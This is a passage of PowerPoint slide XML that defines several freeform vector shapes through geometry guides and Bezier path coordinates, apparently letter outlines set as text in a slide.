                <a:gd name="T5" fmla="*/ 285 h 315"/>
                <a:gd name="T6" fmla="*/ 57 w 209"/>
                <a:gd name="T7" fmla="*/ 270 h 315"/>
                <a:gd name="T8" fmla="*/ 34 w 209"/>
                <a:gd name="T9" fmla="*/ 226 h 315"/>
                <a:gd name="T10" fmla="*/ 17 w 209"/>
                <a:gd name="T11" fmla="*/ 209 h 315"/>
                <a:gd name="T12" fmla="*/ 0 w 209"/>
                <a:gd name="T13" fmla="*/ 229 h 315"/>
                <a:gd name="T14" fmla="*/ 0 w 209"/>
                <a:gd name="T15" fmla="*/ 295 h 315"/>
                <a:gd name="T16" fmla="*/ 15 w 209"/>
                <a:gd name="T17" fmla="*/ 315 h 315"/>
                <a:gd name="T18" fmla="*/ 33 w 209"/>
                <a:gd name="T19" fmla="*/ 293 h 315"/>
                <a:gd name="T20" fmla="*/ 115 w 209"/>
                <a:gd name="T21" fmla="*/ 315 h 315"/>
                <a:gd name="T22" fmla="*/ 209 w 209"/>
                <a:gd name="T23" fmla="*/ 227 h 315"/>
                <a:gd name="T24" fmla="*/ 185 w 209"/>
                <a:gd name="T25" fmla="*/ 168 h 315"/>
                <a:gd name="T26" fmla="*/ 112 w 209"/>
                <a:gd name="T27" fmla="*/ 135 h 315"/>
                <a:gd name="T28" fmla="*/ 72 w 209"/>
                <a:gd name="T29" fmla="*/ 126 h 315"/>
                <a:gd name="T30" fmla="*/ 32 w 209"/>
                <a:gd name="T31" fmla="*/ 80 h 315"/>
                <a:gd name="T32" fmla="*/ 92 w 209"/>
                <a:gd name="T33" fmla="*/ 30 h 315"/>
                <a:gd name="T34" fmla="*/ 161 w 209"/>
                <a:gd name="T35" fmla="*/ 93 h 315"/>
                <a:gd name="T36" fmla="*/ 178 w 209"/>
                <a:gd name="T37" fmla="*/ 107 h 315"/>
                <a:gd name="T38" fmla="*/ 196 w 209"/>
                <a:gd name="T39" fmla="*/ 86 h 315"/>
                <a:gd name="T40" fmla="*/ 196 w 209"/>
                <a:gd name="T41" fmla="*/ 20 h 315"/>
                <a:gd name="T42" fmla="*/ 181 w 209"/>
                <a:gd name="T43" fmla="*/ 0 h 315"/>
                <a:gd name="T44" fmla="*/ 162 w 209"/>
                <a:gd name="T45" fmla="*/ 23 h 315"/>
                <a:gd name="T46" fmla="*/ 92 w 209"/>
                <a:gd name="T47" fmla="*/ 0 h 315"/>
                <a:gd name="T48" fmla="*/ 0 w 209"/>
                <a:gd name="T49" fmla="*/ 82 h 315"/>
                <a:gd name="T50" fmla="*/ 64 w 209"/>
                <a:gd name="T51" fmla="*/ 160 h 315"/>
                <a:gd name="T52" fmla="*/ 121 w 209"/>
                <a:gd name="T53" fmla="*/ 173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9" h="315">
                  <a:moveTo>
                    <a:pt x="121" y="173"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="176"/>
                    <a:pt x="177" y="186"/>
                    <a:pt x="177" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="256"/>
                    <a:pt x="155" y="285"/>
                    <a:pt x="116" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="285"/>
                    <a:pt x="77" y="283"/>
                    <a:pt x="57" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="256"/>
                    <a:pt x="35" y="235"/>
                    <a:pt x="34" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="218"/>
                    <a:pt x="33" y="209"/>
                    <a:pt x="17" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="209"/>
                    <a:pt x="0" y="219"/>
                    <a:pt x="0" y="229"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="295"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="303"/>
                    <a:pt x="0" y="315"/>
                    <a:pt x="15" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="315"/>
                    <a:pt x="29" y="309"/>
                    <a:pt x="33" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="308"/>
                    <a:pt x="83" y="315"/>
                    <a:pt x="115" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="315"/>
                    <a:pt x="209" y="272"/>
                    <a:pt x="209" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="195"/>
                    <a:pt x="191" y="174"/>
                    <a:pt x="185" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="148"/>
                    <a:pt x="151" y="144"/>
                    <a:pt x="112" y="135"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="126"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="121"/>
                    <a:pt x="32" y="103"/>
                    <a:pt x="32" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="54"/>
                    <a:pt x="56" y="30"/>
                    <a:pt x="92" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="30"/>
                    <a:pt x="158" y="77"/>
                    <a:pt x="161" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="104"/>
                    <a:pt x="168" y="107"/>
                    <a:pt x="178" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="107"/>
                    <a:pt x="196" y="96"/>
                    <a:pt x="196" y="86"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="196" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="12"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="181" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="0"/>
                    <a:pt x="166" y="8"/>
                    <a:pt x="162" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="6"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="92" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="0"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="115"/>
                    <a:pt x="23" y="148"/>
                    <a:pt x="64" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="160"/>
                    <a:pt x="114" y="172"/>
                    <a:pt x="121" y="17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39" name="Freeform 130">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1370504D-3310-4259-A59A-141F5401CF72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId26"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3062287" y="1219200"/>
              <a:ext cx="90488" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 85 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 35 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 57 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 67 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 85 w 234"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 149 w 234"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 155 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 149 w 234"/>
                <a:gd name="T33" fmla="*/ 110 h 222"/>
                <a:gd name="T34" fmla="*/ 149 w 234"/>
                <a:gd name="T35" fmla="*/ 152 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 183 h 222"/>
                <a:gd name="T38" fmla="*/ 85 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 234"/>
                <a:gd name="T41" fmla="*/ 155 h 222"/>
                <a:gd name="T42" fmla="*/ 149 w 234"/>
                <a:gd name="T43" fmla="*/ 11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4" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="209" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="219"/>
                    <a:pt x="234" y="219"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="221" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="186"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="41"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="23" y="59"/>
                    <a:pt x="35" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59"/>
                    <a:pt x="57" y="54"/>
                    <a:pt x="57" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="32"/>
                    <a:pt x="58" y="31"/>
                    <a:pt x="67" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="85" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="30"/>
                    <a:pt x="149" y="45"/>
                    <a:pt x="149" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="82"/>
                    <a:pt x="0" y="107"/>
                    <a:pt x="0" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="31" y="222"/>
                    <a:pt x="82" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="222"/>
                    <a:pt x="131" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="149" y="110"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="149" y="152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="164"/>
                    <a:pt x="149" y="174"/>
                    <a:pt x="130" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="89" y="192"/>
                    <a:pt x="85" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="34" y="175"/>
                    <a:pt x="34" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="131"/>
                    <a:pt x="77" y="112"/>
                    <a:pt x="149" y="11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0" name="Freeform 131">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20AA9061-E68C-4BC9-A73A-7FD82B2212D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId27"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3151187" y="1219200"/>
              <a:ext cx="100013" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 36 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 28 w 259"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 28 w 259"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 98 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 30 h 218"/>
                <a:gd name="T26" fmla="*/ 115 w 259"/>
                <a:gd name="T27" fmla="*/ 71 h 218"/>
                <a:gd name="T28" fmla="*/ 115 w 259"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 151 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 143 w 259"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 143 w 259"/>
                <a:gd name="T41" fmla="*/ 98 h 218"/>
                <a:gd name="T42" fmla="*/ 184 w 259"/>
                <a:gd name="T43" fmla="*/ 30 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 71 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 201 w 259"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 239 w 259"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 259 w 259"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 231 w 259"/>
                <a:gd name="T57" fmla="*/ 188 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 186 w 259"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 137 w 259"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 99 w 259"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
                <a:gd name="T66" fmla="*/ 56 w 259"/>
                <a:gd name="T67"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9" h="218">
                  <a:moveTo>
                    <a:pt x="56" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="45" y="3"/>
                    <a:pt x="36" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="10" y="33"/>
                    <a:pt x="28" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="218"/>
                    <a:pt x="85" y="218"/>
                    <a:pt x="85" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="74" y="188"/>
                    <a:pt x="56" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="54"/>
                    <a:pt x="77" y="30"/>
                    <a:pt x="97" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="30"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="188"/>
                    <a:pt x="94" y="188"/>
                    <a:pt x="94" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="218"/>
                    <a:pt x="107" y="218"/>
                    <a:pt x="114" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="188"/>
                    <a:pt x="161" y="188"/>
                    <a:pt x="143" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="143" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="54"/>
                    <a:pt x="164" y="30"/>
                    <a:pt x="184" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="30"/>
                    <a:pt x="203" y="39"/>
                    <a:pt x="203" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="188"/>
                    <a:pt x="181" y="188"/>
                    <a:pt x="181" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="218"/>
                    <a:pt x="194" y="218"/>
                    <a:pt x="201" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="239" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="218"/>
                    <a:pt x="259" y="218"/>
                    <a:pt x="259" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="188"/>
                    <a:pt x="249" y="188"/>
                    <a:pt x="231" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="57"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="0"/>
                    <a:pt x="151" y="7"/>
                    <a:pt x="137" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="9"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="68" y="7"/>
                    <a:pt x="56" y="1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1" name="Freeform 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D9B46B0-53AF-4B16-98B4-54E608D37EB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId28"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3257550" y="1220788"/>
              <a:ext cx="92075" cy="130175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 202 w 237"/>
                <a:gd name="T1" fmla="*/ 30 h 329"/>
                <a:gd name="T2" fmla="*/ 217 w 237"/>
                <a:gd name="T3" fmla="*/ 30 h 329"/>
                <a:gd name="T4" fmla="*/ 237 w 237"/>
                <a:gd name="T5" fmla="*/ 16 h 329"/>
                <a:gd name="T6" fmla="*/ 217 w 237"/>
                <a:gd name="T7" fmla="*/ 0 h 329"/>
                <a:gd name="T8" fmla="*/ 158 w 237"/>
                <a:gd name="T9" fmla="*/ 0 h 329"/>
                <a:gd name="T10" fmla="*/ 138 w 237"/>
                <a:gd name="T11" fmla="*/ 15 h 329"/>
                <a:gd name="T12" fmla="*/ 158 w 237"/>
                <a:gd name="T13" fmla="*/ 30 h 329"/>
                <a:gd name="T14" fmla="*/ 172 w 237"/>
                <a:gd name="T15" fmla="*/ 30 h 329"/>
                <a:gd name="T16" fmla="*/ 136 w 237"/>
                <a:gd name="T17" fmla="*/ 137 h 329"/>
                <a:gd name="T18" fmla="*/ 123 w 237"/>
                <a:gd name="T19" fmla="*/ 180 h 329"/>
                <a:gd name="T20" fmla="*/ 123 w 237"/>
                <a:gd name="T21" fmla="*/ 180 h 329"/>
                <a:gd name="T22" fmla="*/ 112 w 237"/>
                <a:gd name="T23" fmla="*/ 150 h 329"/>
                <a:gd name="T24" fmla="*/ 66 w 237"/>
                <a:gd name="T25" fmla="*/ 30 h 329"/>
                <a:gd name="T26" fmla="*/ 79 w 237"/>
                <a:gd name="T27" fmla="*/ 30 h 329"/>
                <a:gd name="T28" fmla="*/ 98 w 237"/>
                <a:gd name="T29" fmla="*/ 16 h 329"/>
                <a:gd name="T30" fmla="*/ 79 w 237"/>
                <a:gd name="T31" fmla="*/ 0 h 329"/>
                <a:gd name="T32" fmla="*/ 20 w 237"/>
                <a:gd name="T33" fmla="*/ 0 h 329"/>
                <a:gd name="T34" fmla="*/ 0 w 237"/>
                <a:gd name="T35" fmla="*/ 16 h 329"/>
                <a:gd name="T36" fmla="*/ 20 w 237"/>
                <a:gd name="T37" fmla="*/ 30 h 329"/>
                <a:gd name="T38" fmla="*/ 36 w 237"/>
                <a:gd name="T39" fmla="*/ 30 h 329"/>
                <a:gd name="T40" fmla="*/ 106 w 237"/>
                <a:gd name="T41" fmla="*/ 209 h 329"/>
                <a:gd name="T42" fmla="*/ 108 w 237"/>
                <a:gd name="T43" fmla="*/ 215 h 329"/>
                <a:gd name="T44" fmla="*/ 90 w 237"/>
                <a:gd name="T45" fmla="*/ 269 h 329"/>
                <a:gd name="T46" fmla="*/ 50 w 237"/>
                <a:gd name="T47" fmla="*/ 298 h 329"/>
                <a:gd name="T48" fmla="*/ 52 w 237"/>
                <a:gd name="T49" fmla="*/ 287 h 329"/>
                <a:gd name="T50" fmla="*/ 31 w 237"/>
                <a:gd name="T51" fmla="*/ 266 h 329"/>
                <a:gd name="T52" fmla="*/ 9 w 237"/>
                <a:gd name="T53" fmla="*/ 288 h 329"/>
                <a:gd name="T54" fmla="*/ 50 w 237"/>
                <a:gd name="T55" fmla="*/ 329 h 329"/>
                <a:gd name="T56" fmla="*/ 124 w 237"/>
                <a:gd name="T57" fmla="*/ 257 h 329"/>
                <a:gd name="T58" fmla="*/ 202 w 237"/>
                <a:gd name="T59" fmla="*/ 3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329">
                  <a:moveTo>
                    <a:pt x="202" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="217" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="30"/>
                    <a:pt x="237" y="30"/>
                    <a:pt x="237" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="0"/>
                    <a:pt x="225" y="0"/>
                    <a:pt x="217" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="158" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="138" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="150" y="30"/>
                    <a:pt x="158" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="155"/>
                    <a:pt x="127" y="164"/>
                    <a:pt x="123" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="123" y="180"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="170"/>
                    <a:pt x="116" y="160"/>
                    <a:pt x="112" y="150"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="30"/>
                    <a:pt x="98" y="30"/>
                    <a:pt x="98" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="0"/>
                    <a:pt x="87" y="0"/>
                    <a:pt x="79" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="36" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="209"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="214"/>
                    <a:pt x="108" y="215"/>
                    <a:pt x="108" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="216"/>
                    <a:pt x="96" y="257"/>
                    <a:pt x="90" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="297"/>
                    <a:pt x="57" y="298"/>
                    <a:pt x="50" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="298"/>
                    <a:pt x="52" y="294"/>
                    <a:pt x="52" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="275"/>
                    <a:pt x="43" y="266"/>
                    <a:pt x="31" y="266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="266"/>
